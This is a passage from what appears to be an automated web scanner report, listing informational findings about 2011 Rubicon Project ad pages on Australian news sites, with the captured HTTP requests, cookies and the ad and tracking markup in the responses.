<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

<script type="text/javascript" src="http://cdn4.eyewonder.com/cm/js/12963-135748-32613-45?mpt=f8d7f130-eb44-4d57-a129-06e19ec49ade&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOgDAMA7.CMlOpadI24TeFlgmxMSH.jjv5TrL9kghti1sqsi4kCWIibApjCJ3W68kSw9hVg_ZcQ.PkIZbBPg711gfN6SzXnGKdNn8cmZEaxYAKvJ_rAhYgo5r5.wHzDxtt%26redirectURL%3D">
</script>
<noscript>
<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOgDAMA7.CMlOpadI24TeFlgmxMSH.jjv5TrL9kghti1sqsi4kCWIibApjCJ3W68kSw9hVg_ZcQ.PkIZbBPg711gfN6SzXnGKdNn8cmZEaxYAKvJ_rAhYgo5r5.wHzDxtt&redirectURL=http://cdn4.eyewonder.com/cm/nc/12963-135748-32613-45?mpt=f8d7f130-eb44-4d57-a129-06e19ec49ade">
<img src="http://cdn4.eyewonder.com/cm/nb/12963-135748-32613-45?mpt=f8d7f130-eb44-4d57-a129-06e19ec49ade"
alt="Click Here" border="0">
</a>
</noscript>
<img height="1" border="0" width="1" alt="" style="display: none;" src="http://g.ca.bid.invitemedia.com/rubicon_imp?returnType=image&key=AdImp&cost=0.678878&creativeID=147857&message=eJwVjDEOgDAMA7.CMlOpadI24TeFlgmxMSH.jjv5TrL9kghti1sqsi4kCWIibApjCJ3W68kSw9hVg_ZcQ.PkIZbBPg711gfN6SzXnGKdNn8cmZEaxYAKvJ_rAhYgo5r5.wHzDxtt&managed=false"/>
<iframe src='http://pixel.invitemedia.com/data_sync?partner_id=77&exchange_id=9' width='1' height='1' frameborder='0' style='display: none;' scrolling='no' marginheight='0' marginwidth='0'></iframe><img src="http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/><script defer="defer" type="text/javascript">
...[SNIP]...
</script>
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01" style="display: none;" border="0" height="1" width="1" alt=""/><DIV STYLE="height:0px; width:0px; overflow:hidden">
...[SNIP]...

14.58. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-2.html

Issue detail

The page was loaded from a URL containing a query string:

http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html?cb=0.8627023494336754&keyword=smh/business_home

The response contains the following links to other domains:

http://cdn4.eyewonder.com/cm/js/12963-135748-32613-45?mpt=f0ab4cc1-d8d0-45fb-a7e4-8bcf2113e1c6&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOwCAMA79SZS4SIQFCfwO0TKhbp6p_r5l8J9l.SYSOrVhIsm8kAWIibApjCA1fm_bO7rTTO42juZovddb6CMxycU.0pqucY_B52fopyIhULwZU4P3MCUxARjXy9wMftxvl%26redirectURL%3D
http://cdn4.eyewonder.com/cm/nb/12963-135748-32613-45?mpt=f0ab4cc1-d8d0-45fb-a7e4-8bcf2113e1c6
http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOwCAMA79SZS4SIQFCfwO0TKhbp6p_r5l8J9l.SYSOrVhIsm8kAWIibApjCA1fm_bO7rTTO42juZovddb6CMxycU.0pqucY_B52fopyIhULwZU4P3MCUxARjXy9wMftxvl&redirectURL=http://cdn4.eyewonder.com/cm/nc/12963-135748-32613-45?mpt=f0ab4cc1-d8d0-45fb-a7e4-8bcf2113e1c6
http://g.ca.bid.invitemedia.com/rubicon_imp?returnType=image&key=AdImp&cost=0.678878&creativeID=147857&message=eJwVjDEOwCAMA79SZS4SIQFCfwO0TKhbp6p_r5l8J9l.SYSOrVhIsm8kAWIibApjCA1fm_bO7rTTO42juZovddb6CMxycU.0pqucY_B52fopyIhULwZU4P3MCUxARjXy9wMftxvl&managed=false
http://pixel.invitemedia.com/data_sync?partner_id=77&exchange_id=9
http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment
http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01

Request

GET /a/7856/12590/22782-2.html?cb=0.8627023494336754&keyword=smh/business_home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.smh.com.au/business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3165011.js^2^1315404895^1315404918&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; ses2=12338^10&12590^4; rdk=7725/12338; rdk15=0; ses15=12338^7&12590^5

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:19:50 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:19:50 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Wed, 07-Sep-2011 15:19:50 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^133&12590^58; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63609; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2940

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

<script type="text/javascript" src="http://cdn4.eyewonder.com/cm/js/12963-135748-32613-45?mpt=f0ab4cc1-d8d0-45fb-a7e4-8bcf2113e1c6&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOwCAMA79SZS4SIQFCfwO0TKhbp6p_r5l8J9l.SYSOrVhIsm8kAWIibApjCA1fm_bO7rTTO42juZovddb6CMxycU.0pqucY_B52fopyIhULwZU4P3MCUxARjXy9wMftxvl%26redirectURL%3D">
</script>
<noscript>
<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOwCAMA79SZS4SIQFCfwO0TKhbp6p_r5l8J9l.SYSOrVhIsm8kAWIibApjCA1fm_bO7rTTO42juZovddb6CMxycU.0pqucY_B52fopyIhULwZU4P3MCUxARjXy9wMftxvl&redirectURL=http://cdn4.eyewonder.com/cm/nc/12963-135748-32613-45?mpt=f0ab4cc1-d8d0-45fb-a7e4-8bcf2113e1c6">
<img src="http://cdn4.eyewonder.com/cm/nb/12963-135748-32613-45?mpt=f0ab4cc1-d8d0-45fb-a7e4-8bcf2113e1c6"
alt="Click Here" border="0">
</a>
</noscript>
<img height="1" border="0" width="1" alt="" style="display: none;" src="http://g.ca.bid.invitemedia.com/rubicon_imp?returnType=image&key=AdImp&cost=0.678878&creativeID=147857&message=eJwVjDEOwCAMA79SZS4SIQFCfwO0TKhbp6p_r5l8J9l.SYSOrVhIsm8kAWIibApjCA1fm_bO7rTTO42juZovddb6CMxycU.0pqucY_B52fopyIhULwZU4P3MCUxARjXy9wMftxvl&managed=false"/>
<iframe src='http://pixel.invitemedia.com/data_sync?partner_id=77&exchange_id=9' width='1' height='1' frameborder='0' style='display: none;' scrolling='no' marginheight='0' marginwidth='0'></iframe><img src="http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/><script defer="defer" type="text/javascript">
...[SNIP]...
</script>
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01" style="display: none;" border="0" height="1" width="1" alt=""/><DIV STYLE="height:0px; width:0px; overflow:hidden">
...[SNIP]...

14.59. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-2.html

Issue detail

The page was loaded from a URL containing a query string:

http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html?cb=0.5008782960940152&keyword=smh/news_other

The response contains the following links to other domains:

http://ad.turn.com/server/ads.js?pub=5766351&cch=5766918&code=5766926&l=728x90&aid=25805018&ahcid=972586&bimpd=CaJ_lM07IMXi3NigYDUAe0SBb0a6l86OthwCdfEkYcC62ZGsIJLNEOeRyRTTXZHYPHNst5RKy8WKU4-3iCkdmb8wvAhJVp5vH1605NNaPKhH3Hc40cPaTNqetb7TxZG_Hngq6py6H04rQhjgefP3Nx3fWMI7KhyrWqgJYhCiRbpUMYDNuG9lylmFGegZs3d4yEG8BP5dzjykSC6Ht6iJ2ZT02Ti1h452fwgpRY2wxLoyjF_nhB_W_gMlLwGpdcJ0IAJ3vhfefGYtBCDoFcVz7Jias8VN36K8E7qeYA6SXq3xMK_frmzMN839J9se-s8p6aPInsitVDVHi4bpOThNZWrV_7LUn7uuI0x9TMgCSJV1CDCiZyk6lqZP3FnWWvGEyOEuR2bakunP7dL9F3EVXNNzPlQ90q-kuLtlBe_29z7-fBrTpN1ppkK2S614QSg16yUix1UC5red8L7udmEJT1MAsbr_XpExqMlMu3-dM_44jldsCh__clPH9NdPHrdDIZPp8vIQlTB5zS1-20bCwHHphu-UzfDCXoT5Q4N9hQAKBn1Qr-tiIVwRdaXoMXgVvfBz5xDsVEqchMpjM7fNhdm6MqcHUT75ZJk4A7UxuywDU7s3xco0Z7iBYr7DIfApbNGFVWiPguIu6HCsrR1QrL3wc-cQ7FRKnITKYzO3zYVIta2RqrNw6iUvr83e82oB7ooG0_osUcryn5NoqEa1T45jEImZghLDuAyXItQ9HpSjsZQyAQ6kVAwWSib4A4xDhSZ0vmPD0TjGVzAPpQKKX61e2ZVGQ7LdSyxeFNkf-CGjaTiYFIBgaE-RzeyL6tTfpGM6X4y-wO-Gwhnxcy9FyX0lpriMl-1v60tkD4B8fShZA5xP-LKOGfmI9Q4im5wVDxMvrxhhFVlJNMNA9Okq02TL4uQDHjXmsQmHeaQuYzgu99F_08R1wLmmgenofLK7&acp=1AE250511320D835&rtbacid=8e23abccd4e2e9b434d7cf2acc0f7a151e7493e7
http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment
http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01

Request

GET /a/7856/12590/22782-2.html?cb=0.5008782960940152&keyword=smh/news_other HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; ses2=12338^3&12590^1; csi2=3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; cd=false; lm="7 Sep 2011 14:14:36 GMT"; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; rdk=7856/12590; rdk15=1; ses15=12338^3&12590^3; csi15=3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:38 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:15:38 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=1; expires=Wed, 07-Sep-2011 15:15:38 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^7&12590^5; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63861; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2639

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<body>

<script src='http://ad.turn.com/server/ads.js?pub=5766351&cch=5766918&code=5766926&l=728x90&aid=25805018&ahcid=972586&bimpd=CaJ_lM07IMXi3NigYDUAe0SBb0a6l86OthwCdfEkYcC62ZGsIJLNEOeRyRTTXZHYPHNst5RKy8WKU4-3iCkdmb8wvAhJVp5vH1605NNaPKhH3Hc40cPaTNqetb7TxZG_Hngq6py6H04rQhjgefP3Nx3fWMI7KhyrWqgJYhCiRbpUMYDNuG9lylmFGegZs3d4yEG8BP5dzjykSC6Ht6iJ2ZT02Ti1h452fwgpRY2wxLoyjF_nhB_W_gMlLwGpdcJ0IAJ3vhfefGYtBCDoFcVz7Jias8VN36K8E7qeYA6SXq3xMK_frmzMN839J9se-s8p6aPInsitVDVHi4bpOThNZWrV_7LUn7uuI0x9TMgCSJV1CDCiZyk6lqZP3FnWWvGEyOEuR2bakunP7dL9F3EVXNNzPlQ90q-kuLtlBe_29z7-fBrTpN1ppkK2S614QSg16yUix1UC5red8L7udmEJT1MAsbr_XpExqMlMu3-dM_44jldsCh__clPH9NdPHrdDIZPp8vIQlTB5zS1-20bCwHHphu-UzfDCXoT5Q4N9hQAKBn1Qr-tiIVwRdaXoMXgVvfBz5xDsVEqchMpjM7fNhdm6MqcHUT75ZJk4A7UxuywDU7s3xco0Z7iBYr7DIfApbNGFVWiPguIu6HCsrR1QrL3wc-cQ7FRKnITKYzO3zYVIta2RqrNw6iUvr83e82oB7ooG0_osUcryn5NoqEa1T45jEImZghLDuAyXItQ9HpSjsZQyAQ6kVAwWSib4A4xDhSZ0vmPD0TjGVzAPpQKKX61e2ZVGQ7LdSyxeFNkf-CGjaTiYFIBgaE-RzeyL6tTfpGM6X4y-wO-Gwhnxcy9FyX0lpriMl-1v60tkD4B8fShZA5xP-LKOGfmI9Q4im5wVDxMvrxhhFVlJNMNA9Okq02TL4uQDHjXmsQmHeaQuYzgu99F_08R1wLmmgenofLK7&acp=1AE250511320D835&rtbacid=8e23abccd4e2e9b434d7cf2acc0f7a151e7493e7'></script><img src="http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/><script defer="defer" type="text/javascript">
...[SNIP]...
</script>
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01" style="display: none;" border="0" height="1" width="1" alt=""/><DIV STYLE="height:0px; width:0px; overflow:hidden">
...[SNIP]...

14.60. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-2.html

Issue detail

The page was loaded from a URL containing a query string:

http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html?cb=0.3859964762814343&keyword=smh/business_home

The response contains the following links to other domains:

http://cdn4.eyewonder.com/cm/js/12963-135748-32613-45?mpt=cba188b6-c0aa-47b1-8e31-68fe0e58fd0f&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsOwzAMQ68SaK4ByfKH6W3sxJ6CbJ2K3D30xPcAkn9xl..2Ixb_bOKRAndDohlFjt4M6CUc2lpItVvAcAsFc.jImKdOWdNVrjlqXbZ.dmZmJnUQE_H.XRexEI3VbM8LEL4bxA--%26redirectURL%3D
http://cdn4.eyewonder.com/cm/nb/12963-135748-32613-45?mpt=cba188b6-c0aa-47b1-8e31-68fe0e58fd0f
http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDsOwzAMQ68SaK4ByfKH6W3sxJ6CbJ2K3D30xPcAkn9xl..2Ixb_bOKRAndDohlFjt4M6CUc2lpItVvAcAsFc.jImKdOWdNVrjlqXbZ.dmZmJnUQE_H.XRexEI3VbM8LEL4bxA--&redirectURL=http://cdn4.eyewonder.com/cm/nc/12963-135748-32613-45?mpt=cba188b6-c0aa-47b1-8e31-68fe0e58fd0f
http://g.ca.bid.invitemedia.com/rubicon_imp?returnType=image&key=AdImp&cost=0.678878&creativeID=147857&message=eJwVjDsOwzAMQ68SaK4ByfKH6W3sxJ6CbJ2K3D30xPcAkn9xl..2Ixb_bOKRAndDohlFjt4M6CUc2lpItVvAcAsFc.jImKdOWdNVrjlqXbZ.dmZmJnUQE_H.XRexEI3VbM8LEL4bxA--&managed=false
http://pixel.invitemedia.com/data_sync?partner_id=77&exchange_id=9
http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment
http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01

Request

GET /a/7856/12590/22782-2.html?cb=0.3859964762814343&keyword=smh/business_home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.smh.com.au/business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3165011.js^3^1315404895^1315405144&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; ses15=12338^11&12590^9; ses2=12338^18&12590^7

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:31:39 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:31:39 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=04e8588ddb95b3c4623aa79e6; expires=Wed, 07-Sep-2011 15:31:39 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=4e8588dd3e9c0c4d453ad2c4^&12338^8&12590^1; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=62900; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2952

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

<script type="text/javascript" src="http://cdn4.eyewonder.com/cm/js/12963-135748-32613-45?mpt=cba188b6-c0aa-47b1-8e31-68fe0e58fd0f&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsOwzAMQ68SaK4ByfKH6W3sxJ6CbJ2K3D30xPcAkn9xl..2Ixb_bOKRAndDohlFjt4M6CUc2lpItVvAcAsFc.jImKdOWdNVrjlqXbZ.dmZmJnUQE_H.XRexEI3VbM8LEL4bxA--%26redirectURL%3D">
</script>
<noscript>
<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDsOwzAMQ68SaK4ByfKH6W3sxJ6CbJ2K3D30xPcAkn9xl..2Ixb_bOKRAndDohlFjt4M6CUc2lpItVvAcAsFc.jImKdOWdNVrjlqXbZ.dmZmJnUQE_H.XRexEI3VbM8LEL4bxA--&redirectURL=http://cdn4.eyewonder.com/cm/nc/12963-135748-32613-45?mpt=cba188b6-c0aa-47b1-8e31-68fe0e58fd0f">
<img src="http://cdn4.eyewonder.com/cm/nb/12963-135748-32613-45?mpt=cba188b6-c0aa-47b1-8e31-68fe0e58fd0f"
alt="Click Here" border="0">
</a>
</noscript>
<img height="1" border="0" width="1" alt="" style="display: none;" src="http://g.ca.bid.invitemedia.com/rubicon_imp?returnType=image&key=AdImp&cost=0.678878&creativeID=147857&message=eJwVjDsOwzAMQ68SaK4ByfKH6W3sxJ6CbJ2K3D30xPcAkn9xl..2Ixb_bOKRAndDohlFjt4M6CUc2lpItVvAcAsFc.jImKdOWdNVrjlqXbZ.dmZmJnUQE_H.XRexEI3VbM8LEL4bxA--&managed=false"/>
<iframe src='http://pixel.invitemedia.com/data_sync?partner_id=77&exchange_id=9' width='1' height='1' frameborder='0' style='display: none;' scrolling='no' marginheight='0' marginwidth='0'></iframe><img src="http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/><script defer="defer" type="text/javascript">
...[SNIP]...
</script>
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01" style="display: none;" border="0" height="1" width="1" alt=""/><DIV STYLE="height:0px; width:0px; overflow:hidden">
...[SNIP]...

14.61. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22893-15.html

Issue detail

The page was loaded from a URL containing a query string:

http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html?cb=0.4898127138148993&keyword=wa/news_home&rf=http%3A//www.watoday.com.au/

The response contains the following links to other domains:

http://cdn4.eyewonder.com/cm/js/12963-135748-32613-46?mpt=da822447-f000-423f-aea8-003380d22acd&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOwzAMA78SaK4BWZRtpb8x4mYKumUK.vdSE.8Ako8A8t72sI7XJjBKADXSKkXWDDP3UU5VLW44y_zMKKpA6DKbx5KcZnk005GWPzuzMV0RRCd.7.sidmJltfXfH8lVGuw-%26redirectURL%3D
http://cdn4.eyewonder.com/cm/nb/12963-135748-32613-46?mpt=da822447-f000-423f-aea8-003380d22acd
http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOwzAMA78SaK4BWZRtpb8x4mYKumUK.vdSE.8Ako8A8t72sI7XJjBKADXSKkXWDDP3UU5VLW44y_zMKKpA6DKbx5KcZnk005GWPzuzMV0RRCd.7.sidmJltfXfH8lVGuw-&redirectURL=http://cdn4.eyewonder.com/cm/nc/12963-135748-32613-46?mpt=da822447-f000-423f-aea8-003380d22acd
http://g.ca.bid.invitemedia.com/rubicon_imp?returnType=image&key=AdImp&cost=0.679912&ex_uid=9_154e62c97432177b6a4bcd01&creativeID=147856&message=eJwVjDEOwzAMA78SaK4BWZRtpb8x4mYKumUK.vdSE.8Ako8A8t72sI7XJjBKADXSKkXWDDP3UU5VLW44y_zMKKpA6DKbx5KcZnk005GWPzuzMV0RRCd.7.sidmJltfXfH8lVGuw-&managed=false
http://pixel.invitemedia.com/data_sync?partner_id=77&exchange_id=9
http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment
http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01

Request

GET /a/7856/12590/22893-15.html?cb=0.4898127138148993&keyword=wa/news_home&rf=http%3A//www.watoday.com.au/ HTTP/1.1
Host: optimized-by.rubiconproject.com
